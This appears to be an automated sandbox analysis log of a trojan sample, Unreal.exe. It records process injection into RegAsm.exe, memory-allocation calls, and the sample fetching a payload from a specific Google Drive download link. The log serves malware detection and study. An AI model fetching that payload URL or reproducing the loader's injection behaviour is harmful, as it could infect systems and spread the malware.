        Source: RegAsm.exe, 00000008.00000002.5647356413.0000000001108000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/A
        Source: RegAsm.exe, 00000008.00000002.5647356413.0000000001108000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/I
        Source: RegAsm.exe, 00000008.00000000.5526462839.0000000000FE0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000000.5536952737.0000000001151000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuC
        Source: RegAsm.exe, 00000008.00000002.5647356413.0000000001108000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuCY
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
        Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.11.20:49763 version: TLS 1.2
        Source: WerFault.exe, 0000000C.00000003.5552485796.000000000518D000.00000004.00000001.sdmpBinary or memory string: DWM8And16Bit_DirectDrawCreateEx_CallOut
        Source: Unreal.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 828
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeFile deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeJump to behavior
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeFile created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CDJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5FA0B
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5A31F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5000A
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D57996
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D50AC4
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D57281
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5E2B0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D59AA7
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D595CB
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5E567
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D59515
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D59E3B
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DD3728
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DC86BC
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DCFF90
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DDD038
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2E410
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E4837C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DF0320
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E52504
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E534D4
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DF6480
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E42480
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DC1420
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DEB20C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E0A288
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DE9278
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3C21C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E477FC
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2F76C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E0490C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3B88C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DEA818
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DF15F8
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E37600
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E39520
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DEC52C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DF1C10
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E39B34
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DE1D00
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DC9CFC
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DF3CE0
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3CCC8
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DE3C87
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3BC60
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3D9D0
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DCB944
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E41950
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DF0AB0
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3BA74
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DEAA68
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DDEFCC
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DDDFB4
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E45F9C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DD1FA8
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DEFFA8
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E37108
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DCB0C8
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3D058
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E4B058
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E27050
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3C034
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DF502C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E41E00
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E22DD4
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3DD9C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E21D78
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E25ED0
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3BE48
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: String function: 00007FF742DD0DB4 appears 56 times
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: String function: 00007FF742DD0D88 appears 41 times
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: String function: 00007FF742E2BAAC appears 36 times
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5F3D0 NtProtectVirtualMemory,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5A31F NtAllocateVirtualMemory,LoadLibraryA,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D59E3B NtAllocateVirtualMemory,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DDC444 NtQueryInformationProcess,NtQueryInformationProcess,FindCloseChangeNotification,CloseHandle,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DE5B80 ReadFile,FlushFileBuffers,SetEndOfFile,NtSetInformationFile,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DD9FF0 NtSetInformationFile,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DE5DB4 NtQueryInformationFile,NtQueryInformationFile,RtlNtStatusToDosError,
        Source: C:\Users\user\Desktop\Unreal.exeProcess Stats: CPU usage > 98%
        Source: mpasdlta.vdm.23.drStatic PE information: No import functions for PE file found
        Source: mpavdlta.vdm.23.drStatic PE information: No import functions for PE file found
        Source: Unreal.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\Unreal.exeSection loaded: edgegdi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: edgegdi.dll
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\wevtutil.exeProcess token adjusted: Security
        Source: Unreal.exeReversingLabs: Detection: 13%
        Source: Unreal.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Unreal.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\Unreal.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: unknownProcess created: C:\Users\user\Desktop\Unreal.exe 'C:\Users\user\Desktop\Unreal.exe'
        Source: C:\Users\user\Desktop\Unreal.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Unreal.exe'
        Source: C:\Users\user\Desktop\Unreal.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Unreal.exe'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 828
        Source: unknownProcess created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-20b5c938.exe' /q WD
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1496.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-20b5c938.exe /q WD
        Source: unknownProcess created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\A491FE0B-CBB3-0812-A9E9-28E6069853FA.man
        Source: C:\Windows\System32\wevtutil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\A491FE0B-CBB3-0812-A9E9-28E6069853FA.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
        Source: C:\Windows\System32\wevtutil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\Unreal.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Unreal.exe'
        Source: C:\Users\user\Desktop\Unreal.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Unreal.exe'
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1496.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-20b5c938.exe /q WD
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2F118 LookupPrivilegeValueW,GetCurrentProcess,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,
        Source: C:\Users\user\Desktop\Unreal.exeFile created: C:\Users\user\AppData\Local\Temp\~DF256AB04E6125E28E.TMPJump to behavior
        Source: classification engineClassification label: mal92.troj.evad.winEXE@14/8@2/1
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DCB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DDB1C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetLastError,Process32FirstW,GetLastError,Process32NextW,GetLastError,FindCloseChangeNotification,CloseHandle,
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8100:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3060:120:WilError_03
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7508
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3060:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8100:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:304:WilStaging_02
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DE1AE0 FindResourceW,GetLastError,LoadResource,GetLastError,LockResource,GetLastError,SizeofResource,GetLastError,
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000C.00000003.5585066686.00000000069F8000.00000004.00000001.sdmp
        Source: Binary string: CLBCatQ.pdb( source: WerFault.exe, 0000000C.00000003.5557061554.0000000005D84000.00000004.00000001.sdmp
        Source: Binary string: cfgmgr32.pdb( source: WerFault.exe, 0000000C.00000003.5552355608.0000000002833000.00000004.00000001.sdmp
        Source: Binary string: ncryptsslp.pdb1I source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: profapi.pdb( source: WerFault.exe, 0000000C.00000003.5571125548.0000000005D73000.00000004.00000001.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.5551962205.00000000027F4000.00000004.00000001.sdmp
        Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000C.00000003.5562290340.000000000597C000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.5609465686.00000000049A0000.00000004.00000040.sdmp
        Source: Binary string: RegAsm.pdb source: WerFault.exe, 0000000C.00000003.5609368577.00000000049D1000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.5550085829.000000000278F000.00000004.00000001.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000C.00000003.5590237847.000000000699B000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.5559519325.0000000005D62000.00000004.00000001.sdmp
        Source: Binary string: ucrtbase.pdb( source: WerFault.exe, 0000000C.00000003.5554021670.000000000282C000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb( source: WerFault.exe, 0000000C.00000003.5560045007.0000000002839000.00000004.00000001.sdmp
        Source: Binary string: qncryptsslp.pdb source: WerFault.exe, 0000000C.00000003.5574373177.0000000006349000.00000004.00000001.sdmp
        Source: Binary string: msi.pdb source: WerFault.exe, 0000000C.00000003.5555988282.000000000598D000.00000004.00000001.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: schannel.pdb source: WerFault.exe, 0000000C.00000003.5579000492.0000000006587000.00000004.00000001.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: winspool.pdb( source: WerFault.exe, 0000000C.00000003.5553326030.0000000005977000.00000004.00000001.sdmp
        Source: Binary string: MpSigStub.pdbGCTL source: mpam-20b5c938.exe, 00000017.00000003.6155056829.000001C6B5161000.00000004.00000001.sdmp, MpSigStub.exe, 00000018.00000003.6173396179.0000025A7B313000.00000004.00000001.sdmp, MpSigStub.exe.23.dr
        Source: Binary string: WLDP.pdb( source: WerFault.exe, 0000000C.00000003.5563888052.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: sfc_os.pdb( source: WerFault.exe, 0000000C.00000003.5562290340.000000000597C000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb6X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.5551996504.00000000027FA000.00000004.00000001.sdmp
        Source: Binary string: mpr.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: shcore.pdb@X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 0000000C.00000003.5557034969.0000000005D7F000.00000004.00000001.sdmp
        Source: Binary string: cryptbase.pdb( source: WerFault.exe, 0000000C.00000003.5590481067.0000000006A53000.00000004.00000001.sdmp
        Source: Binary string: RegAsm.pdb( source: WerFault.exe, 0000000C.00000003.5554127676.000000000276B000.00000004.00000001.sdmp
        Source: Binary string: cryptsp.pdb( source: WerFault.exe, 0000000C.00000003.5590237847.000000000699B000.00000004.00000001.sdmp
        Source: Binary string: srvcli.pdb source: WerFault.exe, 0000000C.00000003.5579678253.00000000064BF000.00000004.00000001.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000C.00000003.5550573742.0000000002794000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: advapi32.pdb( source: WerFault.exe, 0000000C.00000003.5553459243.0000000005993000.00000004.00000001.sdmp
        Source: Binary string: winspool.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: gpapi.pdb( source: WerFault.exe, 0000000C.00000003.5555030899.0000000006AAD000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000C.00000003.5558896267.0000000005D9B000.00000004.00000001.sdmp
